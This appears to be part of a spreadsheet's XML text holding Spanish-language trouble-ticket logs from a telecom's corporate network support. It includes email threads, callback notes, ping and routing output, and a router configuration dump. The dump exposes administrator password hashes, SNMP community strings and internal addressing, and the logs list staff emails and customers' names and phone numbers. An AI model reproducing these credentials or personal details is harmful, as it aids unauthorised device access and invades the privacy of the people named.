HORARIO DE ATENCION:13:00 - 15:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE ESCRIBE Y SE LE INDICA QUE CNOC RESPONDERA*/*/*
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 18:07
PARA: NELSON GERARDO YUTAN CHARUC &lt;NELSON.YUTAN@SOMOSCMI.COM&gt;; JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE_CLARO XT_DISTRI-MAZATENANGO_SECUNDARIO _ DISTRIBUIDORA MAZATENANGO
BUENAS TARDES NELSON,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE PARA PROCEDER, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
------------------------
¿	DE: NELSON GERARDO YUTAN CHARUC [MAILTO:NELSON.YUTAN@SOMOSCMI.COM]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 17:43
PARA: JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE_CLARO XT_DISTRI-MAZATENANGO_SECUNDARIO _ DISTRIBUIDORA MAZATENANGO
¿	BUENA TARDE ESTIMADOS ESTE CASO TAMBIÉN LO TUVIMOS LA VEZ PASADA EN NOVIEMBRE DE 2021.
¿	ESTA FUE LA SOLUCIÓN QUE HICIERON ADJUNTO CORREO, HASTA QUE REALIZARON ESTA CORRECCIÓN, ESTE SERVICIO PASO MAS DE 15 DIAS FUERA, FAVOR DE CORREGIR BIEN LOS ID Y LAS IP LAN QUE NOS ENTREGAN.</t>
  </si>
  <si>
    <t>*/*/*/SE LE SOLICITA APOYO A GESTOR MIGUELAN.RODRIGUEZ POR SKYPE PARA RESPONDER AL CLIENTE LO SOLICITADO*/*/*/</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE ESCRIBE Y SOLICITA QUE SE VERIFIQUE SI SE HIZO ALGUN CAMBIO INTERNO, SE LE INDICA QUE CNOC RESPONDERÁ*/*/*/
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 17:27
PARA: JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NELSON GERARDO YUTAN CHARUC &lt;NELSON.YUTAN@SOMOSCMI.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE_CLARO XT_DISTRI-MAZATENANGO_SECUNDARIO _ DISTRIBUIDORA MAZATENANGO
BUENAS TARDES JUAN ELÍAS,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE PARA PROCEDER, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
-------------------------------
DE: JUAN ELIAS SIERRA ORTIZ [MAILTO:JUAN.SIERRA@SOMOSCMI.COM]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 16:11
PARA: RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NELSON GERARDO YUTAN CHARUC &lt;NELSON.YUTAN@SOMOSCMI.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE_CLARO XT_DISTRI-MAZATENANGO_SECUNDARIO _ DISTRIBUIDORA MAZATENANGO
BUEN DIA,
RECIÉN REVISE EN NUESTRO MONITOREO Y NO TENEMOS NADA REGISTRADO CON ESA IP, @NELSON GERARDO YUTAN CHARUC TU NOS PUEDES APOYAR VALIDANDO DESDE EL ROUTER?
SEÑORES CLARO, ES NECESARIO TAMBIÉN VALIDEN SI HAN REALIZADO ALGÚN CAMBIO INTERNO, YA QUE NO SERIA LA PRIMERA OCASIÓN QUE SE PRESENTA ESTE ESCENARIO.</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 8:53
PARA: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NELSON GERARDO YUTAN CHARUC &lt;NELSON.YUTAN@SOMOSCMI.COM&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE_CLARO XT_DISTRI-MAZATENANGO_SECUNDARIO _ DISTRIBUIDORA MAZATENANGO
*-*-*-*</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE OPERATIVO SIN PERDIDAS  SI LATENCIAS NO SE  CUENTA CON ALARMAS RECIENTAS HACE 3 DIAS
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 4 DÍAS.
UPTIME GENERAL DEL CPE: 4D16H37M14S
CONFIGURACION DEL CPE:
SHOW ALL-CONFIG
; SHOWING MENU AND SUBMENUS CONFIGURATION FOR ACCESS-LEVEL 15 ...
; L1+ ROUTER 24 13 VERSION 10.7.58MR
   LOG-COMMAND-ERRORS
   NO CONFIGURATION
   SET HOSTNAME CC_SISTEMAS_Y_EQUIPOS_GT_RETALHULEU
   SET HOST-LOCATION "KM 163.5 CARRETERA A CUYOTENANGO"
   ADD DEVICE ETH-SUBINTERFACE ETHERNET0/0 1
   ADD DEVICE ETH-SUBINTERFACE ETHERNET0/0 2
   ADD DEVICE LOOPBACK 5
   SET DATA-LINK AT CELLULAR1/0
   SET DATA-LINK AT CELLULAR1/1
   BANNER LOGIN "#########################################################################"
   BANNER LOGIN "# ADVERTENCIA: USTED DEBE TENER AUTORIZACION PREVIA PARA EL ACCESO      #"
   BANNER LOGIN "# A ESTE SISTEMA. SE REGISTRAN Y SE SUPERVISAN TODAS                    #"
   BANNER LOGIN "# CONEXIONES. CONECTANDO CON ESTE SISTEMA USTED CONSIENTE               #"
   BANNER LOGIN "# COMPLETAMENTE TODA SUPERVISION. EL ACCESO O EL USO                    #"
   BANNER LOGIN "# NO AUTORIZADO SERA PROCESADO AL MAXIMO GRADO DE LA LEY.               #"
   BANNER LOGIN "#                                                                       #"
   BANNER LOGIN "#########################################################################"
;
   TIME TIMEZONE -6
   USER ADMIN HASH-PASSWORD F6AB99C23F1C49586C2F67A4A98BC148
;
   USER GESTIONIP HASH-PASSWORD 09265F35E5E79BC2913779FF24DA92A1
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
   NETWORK LOOPBACK5
; -- LOOPBACK INTERFACE CONFIGURATION --
      DESCRIPTION "MONITOREO DEL CNOC"
;
      IP ADDRESS 10.212.187.215 255.255.255.255
;
;
;
;
;
   EXIT
;
   NETWORK ETHERNET0/0.1
; -- ETHERNET SUBINTERFACE CONFIGURATION --
      DESCRIPTION "WAN PRINCIPAL/_/672400008T/_/"
;
      IP ADDRESS 10.105.1.250 255.255.255.252
;
;
;
;
;
      ENCAPSULATION DOT1Q 1
;
;
;
;
   EXIT
;
   NETWORK ETHERNET0/0.2
; -- ETHERNET SUBINTERFACE CONFIGURATION --
      DESCRIPTION "LAN DEL CLIENTE"
;
      IP ADDRESS 10.20.132.1 255.255.255.0
;
;
;
;
;
      ENCAPSULATION DOT1Q 2
;
;
;
;
   EXIT
;
;
   PROTOCOL IP
; -- INTERNET PROTOCOL USER CONFIGURATION --
      ROUTE 0.0.0.0 0.0.0.0 10.105.1.249
;
      CLASSLESS
;
   EXIT
;
;
;
;
   PROTOCOL SNMP
; -- SNMP USER CONFIGURATION --
      COMMUNITY NM15SNMPRO SUBNET 10.255.24.144 255.255.255.248
      COMMUNITY NM15SNMPRO SUBNET 190.148.15.192 255.255.255.240
;
      TRAP SENDING-PARAMETERS REACHABILITY-CHECKING IP-ROUTE
   EXIT
;
   FEATURE BANDWIDTH-RESERVATION
; -- BANDWIDTH RESERVATION USER CONFIGURATION --
      NETWORK ETHERNET0/0.2
         ENABLE
         CLASS LOCAL 10
;
         CLASS DEFAULT 40
         CLASS DEFAULT RATE-LIMIT 2048 3072 8192
;
         CLASS CONTROL 100 REAL-TIME
;
         RATE-LIMIT 2048 3072 8192
      EXIT
;
   EXIT
;
   FEATURE VLAN
; -- VLAN CONFIGURATION --
      ENABLE
;
      VLAN 1 ETHERNET0/0 PORT 1
      VLAN 1 ETHERNET0/0 PORT INTERNAL
      VLAN 2 ETHERNET0/0 PORT 2
      VLAN 2 ETHERNET0/0 PORT 3
      VLAN 2 ETHERNET0/0 PORT 4
      VLAN 2 ETHERNET0/0 PORT INTERNAL
;
      TAG-DEFAULT ETHERNET0/0 PORT 1 1
      TAG-DEFAULT ETHERNET0/0 PORT 2 2
      TAG-DEFAULT ETHERNET0/0 PORT 3 2
      TAG-DEFAULT ETHERNET0/0 PORT 4 2
;
      TAG-INSERTION ETHERNET0/0 PORT INTERNAL
;
      TAG-REMOVAL ETHERNET0/0 PORT 1
      TAG-REMOVAL ETHERNET0/0 PORT 2
      TAG-REMOVAL ETHERNET0/0 PORT 3
      TAG-REMOVAL ETHERNET0/0 PORT 4
;
   EXIT
;
   DUMP-COMMAND-ERRORS
   END
CC_SISTEMAS_Y_EQUIPOS_GT_RETAL CONFIG$
TABLA ARP DEL ROUTER CPE:
INTERFACES DEL ROUTER:
ETHERNET0/0  UP
SERIAL0/0  DOWN
X25-NODE  UP
CELLULAR1/0  DOWN
CELLULAR1/1  DOWN
LOOPBACK5  UP
ETHERNET0/0.1  UP
ETHERNET0/0.2  UP
INTERFACE IP ADDRESSES:
-----------------------
LOOPBACK5          10.212.187.215/32
ETHERNET0/0.1      10.105.1.250/30
ETHERNET0/0.2      10.20.132.1/24
SPECIAL IP ADDRESSES:
---------------------
INTERNAL-ADDRESS    0.0.0.0
MANAGEMENT-ADDRESS  0.0.0.0
ROUTER-ID           0.0.0.0
GLOBAL-ADDRESS      10.212.187.215
CC_SISTEMAS_Y_EQUIPOS_GT_RETAL IP+
ESTADO Y NIVELES DE RED 3G/LTE:
LAST INFORMATION AVAILABLE:
CC_SISTEMAS_Y_EQUIPOS_GT_RETAL CELLULAR1/0 AT+
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN APN_DIP_XT 10.105.1.250
  PING 10.105.1.250: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.105.1.250 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.55
DISPLAY IP ROUTING-TABLE VPN-INSTANCE APN_DIP_XT 10.105.1.250
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : APN_DIP_XT
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.105.1.250/32  DIRECT  0    0                 0.0.0.0         VLANIF2182			</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE CON LAS ALARMAS ENCONTRADAS EN EL CPE Y PARA QUE PUEDA VALIDAR SI AUN LO VE FUERA Y SI ES ASI QUE NOS PUEDA BRINDAR ALGUNA IP DE ORIGEN Y DESTINO QUE NO  PUEDA ALCANZAR PARA PODER REVIZAR MAS PROFUNDAMENTE</t>
  </si>
  <si>
    <t>SE ENVIAA CORREO A CLIENTE, ADICIONAL SE SOLICITA ABRIR TICKET POR LA CENTRAL PORQUE PRESENTA PERDIDAS POR CRC EN EL PUERTO WAN:
RE: FALLA ENLACE_CLARO XT_DISTRI-MAZATENANGO_SECUNDARIO _ DISTRIBUIDORA MAZATENANGO
¿</t>
  </si>
  <si>
    <t>*/*/*/SE VERIFICA QUE NO HAY SEGUIMIENTO POR PARTE DE CNOC, SE PROCEDE A REALIZAR ESCALACIÓN CON LÍDER KEVYN FONSECA 41284612 ID: 2001711807 YA QUE NO SE LE HA DADO RESPUESTA A LA CONSULTA DE LAS IP¿S QUE HIZO EL CLIENTE /// INDICA QUE DARÁ SEGUIMIENTO*/*/*/*/</t>
  </si>
  <si>
    <t>F4619335</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE
GESTION DE PERMISOS || CMI - CANTATA - BARISTA || 670700008T || CB127 - 3 CALLE 6-72, SECTOR A 3, ZONA 8 MIXCO, C. COMERCIAL SANKRIS, LOCAL NO. C-110</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A GESTIÓN N1 VÍA SKYPE, EN ESPERA DE APOYO DE ÉSTOS. CASO ESCALADO CON PERSONAL DE INGENIERÍA CLARO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIESTER BORRAYO 34840214 QUIEN CONFIRMA QUE YA SE TIENEN GESTIONADOS LOS PERMISOS
-ID 2001734917</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIESTER BORRAYO 34840214 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001417374</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILL 42190223 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001417067</t>
  </si>
  <si>
    <t>CLIENTE SR. LESTER BORRAYO SOLICITA TIEMPO YA QUE ESTA LOCALIZANDO AL PUNTO REMOTO...</t>
  </si>
  <si>
    <t>PUNTO REMOTO, SR. GUILLIAMS ROLDAN 42190223 VALIDA QUIPOS ENCENDIDOS, APLICO REINICIO PERO ENLACE CONTINUA DOWN...</t>
  </si>
  <si>
    <t>SE PLATICA CON GUILLIAMS ROLDAN 42190223 INDICANDOLE QUE SE ADJUNTO EL CORREO SOLICITADO A LA COLA DE CORREOS PARA LA GESTION DE PERMISOS NOS INFORMA QUE YA LO RECIBIO EL CUAL ESTARA TRAMITANDO LOS ACCESOS CON EL CENTRO COMERCIAL QUE NOS RESPONDERA VIA CORREO
2001667799
COLA:
NOMBRE: A: 42190223
NÚMERO: 42190223
DURACIÓN: 0:01:12
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42190223
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 28/06/2022 09:21:20</t>
  </si>
  <si>
    <t>F4619349</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE ANGEL RIODRIGUEZ SOLICITANDO AVANCES ID: 2001629139
SE KLE INFORMA QUE EL TICKET AUN SE ENCUENTRA EN DIAGNOSTICO, CL COMENTA QUE LE URGE EL SERVICIO Y QUE SE LE BRINDEN AVANCES LO MAS PRONTO POSIBLE | SE LE NOTIFICA A ROBERTO.GARCIA VIA SKYPE | FAVOR LLAMAR A CL CENTRAL CUANDO SE TENGAN AVANCES</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ÁNGEL RODRÍGUEZ/CLIENTE; SE LE INDICA QUE SE ESTÁ REALIZANDO PRUEBAS CON PERSONAL DE PR; AVANCES EN 15/20 MINUTOS.
SE CONSULTA A GESTIÓN N1 VÍA SKYPE SI ENLACE ASOCIADO A FALLA DEL CORTE DE FO EN SECTOR.</t>
  </si>
  <si>
    <t>F4619371</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 8:58
PARA: PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JOSE FUENTES &lt;JFUENTES@GTC.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: DENIS SICA &lt;DSICA@GTC.COM.GT&gt;; INCIDENTES INFRAESTRUCTURA &lt;IPINFRA@GTC.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; BAUTISTA CASTILLO GABRIEL ALFONSO &lt;GABRIEL.BAUTISTA@CLARO.COM.GT&gt;; TANYA.GUAY@CLARO.COM.GT &lt;TANYA.GUAY@CLARO.COM.GT&gt;; JUAN JOSE ANLEU SARAVIA &lt;JUAN.ANLEU@CLARO.COM.GT&gt;; GRISELDA SORAYDA ARIAS &lt;GRISELDA.ARIAS@CLARO.COM.GT&gt;; MANUEL.HOWELL@CLARO.COM.GT &lt;MANUEL.HOWELL@CLARO.COM.GT&gt;; MARLON PERALTA &lt;MPERALTA@GTC.COM.GT&gt;; VICTOR LEIVA &lt;VMLEIVA@GTC.COM.GT&gt;
ASUNTO: RE: INCONSISTENCIA EN ENLACE DE BANCO GYT CLARO AGENCIAS
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4619423</t>
  </si>
  <si>
    <t>ENALCE OPERATIVO POR PARTE DE CLARO SE PROC EDE CON CIERRA POR ENERGIA COMENRCIAL
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PIN  -VP TRANSFERENCIAS 10.218.49.42
  PING 10.218.49.42: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.49.42: BYTES=56 SEQUENCE=1 TTL=58 TIME=91 MS
    REPLY FROM 10.218.49.42: BYTES=56 SEQUENCE=2 TTL=58 TIME=85 MS
    REPLY FROM 10.218.49.42: BYTES=56 SEQUENCE=3 TTL=58 TIME=92 MS
    REPLY FROM 10.218.49.42: BYTES=56 SEQUENCE=4 TTL=58 TIME=84 MS
    REPLY FROM 10.218.49.42: BYTES=56 SEQUENCE=5 TTL=58 TIME=88 MS
  --- 10.218.49.42 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 84/88/92 MS
&lt;GNCYGTG2N2D4A05A15EIM10&gt;
RUTA IP
PE 10.179.28.50
&lt;GNCYGTG2N2D4A05A15EIM10&gt;DIS CUR | INCLUDE 10.218.49.42
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
&lt;GNCYGTG2N2D4A05A15EIM10&gt;DIS IP ROUTIN VP TRANSFERENCIAS 10.218.49.42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t>
  </si>
  <si>
    <t>F4619441</t>
  </si>
  <si>
    <t>ENALCE CAIDO SE PROCEDE A VALIDAR CON EL PUNTO REMOTO PARA REALIZAR DESCARTE DE 1ER NIVEL
PE 10.179.28.80.
&lt;GNCYGTAKN2D1C08A03EIM6&gt;DIS IP ROUTING-TABLE VPN-INSTANCE  WALLMART_2 10.103.100.180
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALLMART_2
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
        0.0.0.0/0   STATIC  1    0             RD  10.78.163.164   VLANIF3238
&lt;GNCYGTAKN2D1C08A03EIM6&gt;DIS CUR INTER VLANIF3238
#
INTERFACE VLANIF3238
 DESCRIPTION WALLMART_2
 IP BINDING VPN-INSTANCE WALLMART_2
 IP ADDRESS 10.78.163.161 255.255.255.240
 ARP EXPIRE-TIME 300
 UNDO ICMP NAME NET-UNREACHABLE SEND
 UNDO ICMP NAME HOST-UNREACHABLE RECEIVE
 UNDO ICMP NAME PROTOCOL-UNREACHABLE RECEIVE
 UNDO ICMP NAME PORT-UNREACHABLE SEND
#
RETURN</t>
  </si>
  <si>
    <t>F4619510</t>
  </si>
  <si>
    <t>***--- CL AUTORIZA CIERRE DE SD --***
DE: TACO BELL CAYALÁ [MAILTO:TB39@TACOBELL.COM.GT]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 01:45
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NELSON REYES &lt;NREYES@TACOBELL.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ASUNTO: RE: SEGUIMIENTO TTK SD1139236
BUEN DIA, TODO EN ORDEN CERRARLO PORFAVOR.
SLDS,
AGUSTIN</t>
  </si>
  <si>
    <t>DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 0:54
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; TACO BELL CAYALÁ &lt;TB39@TACOBELL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SEGUIMIENTO TTK SD1139236
ESTIMADO CLIENTE SE TUVO LLAMADA CON PERSONAL DE PUNTO REMOTO EL REALIZO REINICIO EN LOS EQUIPOS Y VALIDAMOS LOS INDICADORES LED POR FAVOR PODRÍAN VALIDAR SU RED INTERNA YA QUE SE VEN CAIDAS UNAS INTERFACES DE SU RED LO CUAL PODRÍA PROVOCAR ALGÚN INCONVENIENTE EN EL SERVICIO EN EL PUNTO REMOTO YA QUE EL ENLACE ES DE DATOS NO INTERNET Y LA PROBLEMÁTICA QUE INDICAN EN EL PUNTO REMOTO ES QUE NO TIENEN INTERNET.
A ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>****--- CL VALIDA FUNCIONAMIENTO  VÍA MAIL SE LE CONSULTA SI SE PUEDE PROCEDER CON EL CIERRE --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 01:38
PARA: TACO BELL CAYALÁ &lt;TB39@TACOBELL.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NELSON REYES &lt;NREYES@TACOBELL.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ASUNTO: RE: SEGUIMIENTO TTK SD1139236
BUENOS DÍAS ESTIMADO SR. ISAGUIRRE.
                GRACIAS POR LA CONFIRMACIÓN, PODRÍA INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: TACO BELL CAYALÁ [MAILTO:TB39@TACOBELL.COM.GT]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 01:23
PARA: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NELSON REYES &lt;NREYES@TACOBELL.COM.GT&gt;
ASUNTO: RE: SEGUIMIENTO TTK SD1139236
BUEN DÍA,
YA ESTA FUNCIONANDO CON NORMALIDAD.
POR EL APOYO, MUCHAS GRACIAS
SALUDOS,
AGUSTIN ISAGUIRRE</t>
  </si>
